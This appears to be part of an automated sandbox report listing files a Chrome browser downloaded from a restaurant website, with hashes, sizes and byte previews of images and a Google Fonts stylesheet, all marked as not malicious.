                                                                                                                                                    SSDEEP:3072:wc24tiRc24tizRD2nouR8FwnDAF4zg9Vy2ZGzWjxvpvhEZ6iH:wc2lRc2lVDv1wnDxzg9dw2xBu6iH
                                                                                                                                                    MD5:8CA02AC466605A701F8B2CBCE18BD2A8
                                                                                                                                                    SHA1:2D9FD819EE807EA58173ACC12A56AA92A3D0AB5F
                                                                                                                                                    SHA-256:58F030223A34D16B7712B17DB7D0958832353B65DFB9418827B0BD8AF6C22D60
                                                                                                                                                    SHA-512:C141D8EBAAE7B02A1277957859FBB8C2CBF80E0623614BDB70F93D6C697A7A52253C42E99650CCA96A0555F208BD1E9DE7BFF979F8C7E75E5BF0BFAE09C56CDC
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/gallery/gallary-m-1.jpg
                                                                                                                                                    Preview:..../.Exif..MM.*...............@...........*...........................................................................(...........1.....".....2..........i.............$............'.......'.Adobe Photoshop CC 2015 (Windows).2022:07:26 22:06:20.............0221...................................................................r...........z.(.........................................H.......H..........Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..a.v....b......-"7.s.~:".=.i0g...elu....i.....'."..;.K.b8..(.v...x'RT..t
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=1068, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=1600], progressive, precision 8, 571x1068, components 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):157146
                                                                                                                                                    Entropy (8bit):7.945975707946798
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:kKB/KBrNiUlcXO7TXC1wGDnYUDGqCIRioemEHUKs+jNN9cYkSEUCgI4KJ:kKB/KBrNPC1wt0GWVsT/9cwE9g6
                                                                                                                                                    MD5:C22FD59F6EA98ED097099F945ABAECE2
                                                                                                                                                    SHA1:B7F0FC7D52739046A0867201939E91DE55602EC6
                                                                                                                                                    SHA-256:401BFE1327E5F4C79ABEFAC3D42883AA8DD98A6E4D7435CFAE717C450C01F5DA
                                                                                                                                                    SHA-512:A3E8369B73C44A2F827B8C36F979F8CCEC4382D97A4D964F8175178BB44002626F33C0110FBA36F5E9FAFC1B041D2D8483F2A1BB82DA6C39E841761CE8F65D7B
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:.....@Exif..MM.*...............@...........,...........................................................................(...........1.....".....2..........i.............$............'.......'.Adobe Photoshop CC 2015 (Windows).2023:10:05 17:19:26.............0221.......................;...........,...............................r...........z.(.........................................H.......H..........Adobe_CM......Adobe.d...................................................................................................................................................V.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..c....Ek..I.^).,......O5&..d....r.......:..Vj.i.Q...V\....R.5......?..H
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 1300 x 519, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):731743
                                                                                                                                                    Entropy (8bit):7.963844619806945
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12288:w+Hgx/GoveW6pPmKEgA1jVPoTqMH+aOymWmolQHkj63Low1p67zkFd9dBAz5Gx:rkeX/TWPoT7H+aato+E+boup6zkHRAO
                                                                                                                                                    MD5:CD6C44F9A09A223C3D02340FCE34626B
                                                                                                                                                    SHA1:6118E6BCB524834EAC102CCECAFAADA0A1375698
                                                                                                                                                    SHA-256:1F648E04DE6027B10D797CBC9B6245CDA488F57E5C154A3715F4D19EE17F4F34
                                                                                                                                                    SHA-512:64F12171E38054BA852C3E01A0364756C768A3849F2CCF763AB28C85BB9BFCCBE3402ED7304321BB76BAFACBE7B1F47F82BABC76529E5AD5EC332C246A9F9EF8
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:.PNG........IHDR................S....pHYs................MiCCPPhotoshop ICC profile..x.SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m.......
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=17, height=6000, bps=0, PhotometricIntepretation=RGB, manufacturer=Canon, model=Canon EOS 200D II, orientation=upper-left, width=4000], progressive, precision 8, 688x1032, components 3
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):165434
                                                                                                                                                    Entropy (8bit):7.9103296079104295
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:38+8UBQSZOLSFSj9crdOV05zbv62GvMUvTECrSafNXbt7sE+x:71O+E9crtSWUv2afNXbt7sE+x
                                                                                                                                                    MD5:D9215AFFA3CC9EC7AF2847F070D5B311
                                                                                                                                                    SHA1:4D36E1C714E425CBEC3E67347CA5F866A7FE0C61
                                                                                                                                                    SHA-256:F8995E186329F07AD9EA27A71D0D2E8BE2414E9BB04450A89AB85518FA282F3B
                                                                                                                                                    SHA-512:C8A774B0A00E0C40FB5A67F43B64270C7CA76FC15CBF628F96C6A7F683205310C118C2CA67641D34FE9EAB80AC886AFA3EF9FCB1162000436CBC9AF7600997E6
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/img_recipe_8.jpg
                                                                                                                                                    Preview:.....PExif..MM.*...........................p...................................................................................................(...........1.....".....2.........*.........................i.........@.%.........$...8......Canon.Canon EOS 200D II.......'.......'.Adobe Photoshop CC 2015 (Windows).2023:10:05 17:14:42....)...........2...........:."...........'.......@...0...........2.........@........0231...........B...........V...........j...........q...........x........................................................................................................50..........50..........50..........0100.....................................................................................................................................0...........1...........2..........4..........5..........................................2023:08:19 16:09:11.2023:08:19 16:09:11.+10:00.+10:00.+10:00............................K.................................................................
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 112 x 75, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):39909
                                                                                                                                                    Entropy (8bit):6.0536242496723505
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:768:i2dDidsU5AddAzNJQveQOZZ1EbYvw3AFsAu95GA:xz38aveL128wQPuXGA
                                                                                                                                                    MD5:83AE8CDD28F1FFABC97BDC4BBAF5DB4F
                                                                                                                                                    SHA1:13082C7158DF2641473C3209AE8BD743882A1B45
                                                                                                                                                    SHA-256:D6BC97500294B4EB4899059506B229208E21BC65B26149774CD1E7B2794E063B
                                                                                                                                                    SHA-512:951FECC40D41864A95C9D1B67BA8DB7EE245B0EF371C12AB6078FBA4FEB57B49D0CFD1356219B67C263CAE156FF23FA26D6679B3A1C9BBD76C9061E76B3F0705
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:.PNG........IHDR...p...K......].%....pHYs................MiCCPPhotoshop ICC profile..x.SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m.......
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 1300 x 516, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):269477
                                                                                                                                                    Entropy (8bit):7.86155947959922
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6144:Vww5H0rvqpx9XscYc+6DrtKrS1DeU29KJVXf:VwwSzqpX1Yd6DhKrS1DeU29KLP
                                                                                                                                                    MD5:2692C22462D44AC9B7A76316694D047C
                                                                                                                                                    SHA1:F03E6A7CDE005C111B1267732BAD140D61A51137
                                                                                                                                                    SHA-256:D4D74F6A711DE2C3E4776367BB33B9DB95FEE1DCE087D9CE047995D9BE497CA7
                                                                                                                                                    SHA-512:59B189051581977DAFB679F2DF53FC5BD4337F77FAA4D34A8774FC83D32B12C659D63DECE817FB8504D661B212D0399C4B372D5D6D993777D24713F64D26E40E
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:.PNG........IHDR.............h.......pHYs................:iCCPPhotoshop ICC profile..x...K.a...o.8..S.....A.A1........P...S..q..Df.`.k.D.-...L.`.....`0.$.... ......B.3'.^ ..-.&.g"f...".E#......x|._.=#..C9......iO._..t\.b.....@l...u.."`.f..Q..L.+.a7..0..,.G`*..v.7w.4...Q.=..`..."?.......*~.>..O.J~.O..../~.<..C.z.;.ns..x.......`-4.......b..(..g.}...x.y{P.{.....S.!Y....C.iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:photoshop="http://ns.adobe.com/photoshop/
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 1300 x 516, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1271200
                                                                                                                                                    Entropy (8bit):7.982751134430842
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24576:m33QyD15+0vP0cJLHfM/hH/xjgYRtwMrXo2PyHl4aA/wdIlZBevPxrAE:m33LV0KL+iOXTPVis20E
                                                                                                                                                    MD5:3E757C3E05AF7C01BF79DAE12863CD2D
                                                                                                                                                    SHA1:7EC39B15082B979E049374E6D1E15A197CECC729
                                                                                                                                                    SHA-256:33DD95B31144C4BA2180CD2A791AA124CFA99455BC4CB9798B4DAE936EC23966
                                                                                                                                                    SHA-512:4C6163B1F2BB4B09666E89CAE719FD78100F13F6ECDC4B0450692BFF9D510F8C019388F56597A1ACD3CBECFFCD849DD3C40B3369C43DCB4D05CB99148D269652
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:.PNG........IHDR.............h.......pHYs...............A.iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:tiff="http://ns.adobe.com/tiff/1.0/". xmlns:exif="http://ns.adobe.com/exif/1.0/">. <xmpMM:DocumentID>adobe:docid:photoshop:616bbda8-0d05-11ed-86e7-ddf6a1902901</xmpMM:DocumentID>. <xmpMM:InstanceID>xmp.iid:9c884f13-0278-03
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=17, height=4000, bps=0, PhotometricIntepretation=RGB, manufacturer=Canon, model=Canon EOS 200D II, orientation=upper-left, width=6000], baseline, precision 8, 900x900, components 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):201780
                                                                                                                                                    Entropy (8bit):7.943643350297315
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:EQVZVkQ3GiplJkR2D98I6ctKdvugUjOMWiT4fo2g0LdNob1gNl4ZWMWOG6jofTc/:XbTZp78IRtUvuZotho1gZMiKoLc/
                                                                                                                                                    MD5:FB9364CB4E114BDFB720EBCFA415E05B
                                                                                                                                                    SHA1:CBC94FEE885EF6D9B75163F141EEA6ECEE9636A2
                                                                                                                                                    SHA-256:675FF4967DBB15F37EEDA330294D9E9EABF201B57AF785B70F29DE931D6B2497
                                                                                                                                                    SHA-512:78503E33B98806026361A3C5EF241612C53B9DBD3863573B7314962730247BC9B8809D5FB2A3140DF2D6C97432B8703757A7C13BDA1FB0909441BE1BFCD077C2
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:....%|Exif..MM.*...............p...............................................................................................................(...........1.....".....2.........*.........................i.........@.%.........,...@......Canon.Canon EOS 200D II.......'.......'.Adobe Photoshop CC 2015 (Windows).2023:09:29 18:43:08....)...........2...........:."...........'...........0...........2.................0231...........B...........V...........j...........q...........x........................................................................................................92..........92..........92..........0100.....................................................................................................................................0...........1...........2..........4..........5.................................P...-....2023:08:19 15:55:19.2023:08:19 15:55:19.+10:00.+10:00.+10:00...`.......`..................................................................................
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=17, height=4000, bps=0, PhotometricIntepretation=RGB, manufacturer=Canon, model=Canon EOS 200D II, orientation=upper-left, width=6000], baseline, precision 8, 290x290, components 3
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):80554
                                                                                                                                                    Entropy (8bit):7.849045795725211
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:I+I04mxxQ5004mxxQ5fcVWcLMNHMpPpqi9BA8p/LuO8s+4xVD88C90kcp:I980080kktwTBAM/aO8sdVD811+
                                                                                                                                                    MD5:49A4B8BD91134C5456957A8FD0015EC2
                                                                                                                                                    SHA1:60BC713DD13EDEDD9BF45831F4ECCEDF44C3FEAF
                                                                                                                                                    SHA-256:4C82F9A7383A3B1ABC4F0086500213796B56E76DC55F9CFCDAE4283A3AF94851
                                                                                                                                                    SHA-512:4B2639E040DA80E2F1096E1F1C2BFDA37A4148AFEC03EA2843D0D48660B12D8226F32BC7CE4899555954E89923BF4DF131BB90E5B6FB0FF5BD28408F84E76A51
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/featured-image-03.jpg
                                                                                                                                                    Preview:....).Exif..MM.*...............p...............................................................................................................(...........1.....".....2.........*.........................i.........@.%.........,...@......Canon.Canon EOS 200D II.......'.......'.Adobe Photoshop CC 2015 (Windows).2023:09:27 19:56:47....)...........2...........:."...........'...........0...........2..................0231...........B...........V...........j...........q...........x........................................................................................................45..........45..........45..........0100......................."...........".................................................................................................0...........1...........2..........4..........5.................................<...-....2023:08:19 15:41:31.2023:08:19 15:41:31.+10:00.+10:00.+10:00...........`..................................................................................
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=1068, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=1600], progressive, precision 8, 700x700, components 3
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):153031
                                                                                                                                                    Entropy (8bit):7.941882521878217
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:p2/e02/e98u6Mxgbk9KnG2YrXm31DU9hiM06Y95vsl7x5:peUTb6KkhiL/El7z
                                                                                                                                                    MD5:62CACB2F198D145F7B123AFAF996BF90
                                                                                                                                                    SHA1:279335060B03CE779A10AB73A9E7EA449B4A969C
                                                                                                                                                    SHA-256:CCF4CACB106C44636979C1BDD7998EAC72724079726DE7B5831F3C7563AA58AD
                                                                                                                                                    SHA-512:D572DCAA3A3510427274EE002BED6D0C7F467CB3DC5973638A172FC19B8C594757151E50DB639B3D2FAAC8FECF5060549C4543B0DFB595757FD467C79AA3A69B
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/gallery/gallary-m-5.jpg
                                                                                                                                                    Preview:..../.Exif..MM.*...............@...........,...........................................................................(...........1.....".....2..........i.............$............'.......'.Adobe Photoshop CC 2015 (Windows).2022:07:26 22:16:23.............0221...................................................................r...........z.(................................-~.......H.......H..........Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?......;.U.......yMUq^.....*~..".:G?.......f.....H=..R....W..e.?.um....Y....
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=17, height=4000, bps=0, PhotometricIntepretation=RGB, manufacturer=Canon, model=Canon EOS 200D II, orientation=upper-left, width=6000], baseline, precision 8, 4468x3918, components 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1627844
                                                                                                                                                    Entropy (8bit):7.929092982156362
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:49152:SBlOsI8HDDrSz5deyonMW2ssvI+VThPhD:wlRD3Kre99s/Fl
                                                                                                                                                    MD5:8A6E95F265ED9BC459F834D1BFE746B7
                                                                                                                                                    SHA1:2E733BA54C200E0F2F19BAC24041D3CC67124725
                                                                                                                                                    SHA-256:4AB788F154CCEAC22C96528F7EF65ACA4D27493F4373AAD3F6D1E145FE7AC4DA
                                                                                                                                                    SHA-512:D0DE0C48AA0744F72D94544B795AD320E80C8CB943214AE0806D6B722FCF5F0BE46FF6B05D968EBA3E6A9CBACDEAE96AF282536221DB72C6379F8AB09F8062EB
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:....#.Exif..MM.*...............p...............................................................................................................(...........1.....".....2.........*.........................i.........@.%.........,...@......Canon.Canon EOS 200D II.......'.......'.Adobe Photoshop CC 2015 (Windows).2023:09:29 18:13:38....)...........2...........:."...........'...........0...........2..................0231...........B...........V...........j...........q...........x........................................................................................................93..........93..........93..........0100.......................t...........N.................................................................................................0...........1...........2..........4..........5.................................P...-....2023:08:19 14:40:30.2023:08:19 14:40:30.+10:00.+10:00.+10:00...`.......`..................................................................................
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:ASCII text, with very long lines (1981)
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):119527
                                                                                                                                                    Entropy (8bit):5.118755421988703
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:QVDcsC217CXTG6jpiMQosh/8prUsX59OTq/WtVftNDgqmds:T017+bnTtsuENOC
                                                                                                                                                    MD5:10E284D9FC796E958EE9FFD0DBE76B04
                                                                                                                                                    SHA1:E185300867A6D491AA550724CCAC03421763B472
                                                                                                                                                    SHA-256:45B2C9580C4BED5496A3099A7767C705A4466F88F1C409090356D6490A2FCFDA
                                                                                                                                                    SHA-512:DF2C99173B6E866EEEADDE572423949819E317E52CFB463F4E0079ABADE9201E062CB40D36AB7F632AC0CC2C0928665107B56743713DDBED7FD8C4AC46446684
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://fonts.googleapis.com/css2?family=Dancing+Script:wght@500;600;700&family=Mochiy+Pop+One&family=Pacifico&display=swap
                                                                                                                                                    Preview:/* vietnamese */.@font-face {. font-family: 'Dancing Script';. font-style: normal;. font-weight: 500;. font-display: swap;. src: url(https://fonts.gstatic.com/s/dancingscript/v25/If2RXTr6YS-zF4S-kcSWSVi_szLviuEViw.woff2) format('woff2');. unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;.}./* latin-ext */.@font-face {. font-family: 'Dancing Script';. font-style: normal;. font-weight: 500;. font-display: swap;. src: url(https://fonts.gstatic.com/s/dancingscript/v25/If2RXTr6YS-zF4S-kcSWSVi_szLuiuEViw.woff2) format('woff2');. unicode-range: U+0100-02AF, U+0304, U+0308, U+0329, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;.}./* latin */.@font-face {. font-family: 'Dancing Script';. font-style: normal;. font-weight: 500;. font-display: swap;. src: url(https://fonts.gstatic.com/s/dancingscript/v25/If2RXTr6YS-zF
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=949, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=1227], progressive, precision 8, 321x910, components 3
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):77762
                                                                                                                                                    Entropy (8bit):7.88686945084929
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:VHKIWHKI+NjgZUkBq201WvDog+1kUn0sC7zom1HuOV4IDoWWjK2:VHpWHp/6kM2YWvkpJihdmNHj9
                                                                                                                                                    MD5:F92FBF67D7551188AFE07C848F29837F
                                                                                                                                                    SHA1:C327E19D329F4F5D70B8C529FC79473A10AA8B52
                                                                                                                                                    SHA-256:B85B106E9AFB5A5E40D681364297EAE653576F6F8F085A2BE73AB2414CA8F2D4
                                                                                                                                                    SHA-512:FB72671B09492ECEEC1860188D7E9EBA464A61860399CDB054613C7530A143C3E7F562A28486121471804CE90A807B0756800FABE1C9197C45EBD550A79C409B
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/img_recipe_3.jpg
                                                                                                                                                    Preview:......Exif..MM.*.......................................................................................................(...........1.....".....2..........i.............$............'.......'.Adobe Photoshop CC 2015 (Windows).2023:09:27 16:58:51.............0221.......................A...........................................r...........z.(.........................................H.......H..........Adobe_CM......Adobe.d...................................................................................................................................................8.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..g...p.pl~s..unh...[Z_.......E._......j_U....Xp..........~..K.[..G.%.u.
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 55 x 45, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):25627
                                                                                                                                                    Entropy (8bit):3.8515761006332356
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:AfC3qkYqkDWnzz5BcJfAQgeQwlMDYbOBgku:OC3Od5AQ1Q+cu
                                                                                                                                                    MD5:CD2A77EA22F5DF7C8DFFCAEFF8673A4C
                                                                                                                                                    SHA1:B6FA15977A8EEB11ACB789AF40D8CB4A18706F9A
                                                                                                                                                    SHA-256:8C43FB6A832096F2270924C69B5CDF142FAE0CB91C4AE2F6F0B2D03A3828E67B
                                                                                                                                                    SHA-512:C850BE1E4D57E49697380FF9C12657CD90645007E4B408D19AF6B59F2A42B1F4B89B314936E709FCEDC3FF36990C384F098B7F98F1527C21B5D0E514323BD51E
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/food_menu_tea.png
                                                                                                                                                    Preview:.PNG........IHDR...7...-............pHYs...............V.iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:MicrosoftPhoto_1_="http://ns.microsoft.com/photo/1.0/". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:tiff="http://ns.adobe.com/tiff/1.0/". xmlns:exif="http://ns.adobe.com/exif/1.0/">. <MicrosoftPhoto_1_:LastKeywordXMP>. <rdf:Bag>. <r
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=13, height=1068, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=1600], progressive, precision 8, 700x700, components 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):158797
                                                                                                                                                    Entropy (8bit):7.9448218302132165
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:9N6OiN6OPKP8VjiZMwBfJPMCHFDo9mJsiBi76jfJXgyPAr4GTCcuDHezph:9N6OiN6OhVjC/P3to98FBi769XgfMgC4
                                                                                                                                                    MD5:B2CE0BAEC8FA0884BDF35F900DB13052
                                                                                                                                                    SHA1:28EF0CCE4901C2C1A562C5D6A1FF8AC9ABF6A175
                                                                                                                                                    SHA-256:73C4BE64554E6B0178A2E8A532FA19DBDA88D65DAD0ED61BCDA2C89D6FD8CB6A
                                                                                                                                                    SHA-512:EE5F369CCA9BD970B777D102A79AD6B9838C65F8BF022538BF19943D67203D295C793A2F37C62584AE445C2BBA1E097DA38785CE9372B0E67A36C20E3E49D609
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:....1.Exif..MM.*...............@...........,...........................................................................(...........1.....".....2.......................i.............T............'.......'.Adobe Photoshop CC 2015 (Windows).2022:07:26 22:25:27.............0221....................0100.............................................................................................(................................/........H.......H..........Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..3...U.X.;4..t!V.C~.."A.|..
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
